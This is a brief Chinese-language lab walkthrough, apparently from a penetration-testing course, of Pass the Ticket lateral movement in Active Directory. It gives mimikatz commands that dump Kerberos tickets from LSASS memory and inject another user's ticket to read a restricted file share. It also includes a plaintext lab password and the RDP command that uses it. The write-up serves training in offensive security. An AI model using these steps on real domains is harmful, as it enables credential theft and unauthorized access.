Active Directory 中的橫向移動 - PtT
Active Directory 中的橫向移動 - PtT Pass the Ticket 使用 CORP\jen / Nexus123! RDP 登入到 Client76 └─$ xfreerdp /u:jen /p:'Nexus123!' /d:corp.com /v:192.168.191.76 直接存取 web04 上的 backup 資料夾看看 ls \\web04\backup 直接顯示 Access is denied 啟動 mimikatz 然後開啟 debug mode : privilege::debug 接著輸入 sekurlsa::tickets /export 從記憶體中匯出所有 TGT/TGS 可以看到 dave 的 Session Key 退出 mimikatz 執行 dir *.kirbi 這是因為 sekurlsa::tickets /export 顯示出來的結果是解析記憶體中的 LSASS 進程空間以查找任何 TGT/TGS,然後以 kirbi mimikatz 格式儲存到磁碟,所以我們直接列出所有的 *.kirbi 如下 因為我們的目標是 web04 所以將相關的 *.kirbi 專注在有 web04 的地方 可以看到是 dave @ web04,其中一筆是 [0;163e20]-0-0-40810000-dave@cifs-web04.kirbi 透過 mimikatz 的 ptt 方式執行 kerberos::ptt [0;163e20]-0-0-40810000-dave@cifs-web04.kirbi 再 klist 看一下,可以看到網域中 dave 的憑證了 針對的伺服器是 cifs/web04@corp.com 再執行 ls \\web04\backup 這一次沒有 Access is denied 了,直接列出相關的資源供查看 練習 : 與上面一樣,最後拿那個分享資料夾的 flag.txt 直接將 ls 改 type 即可讀取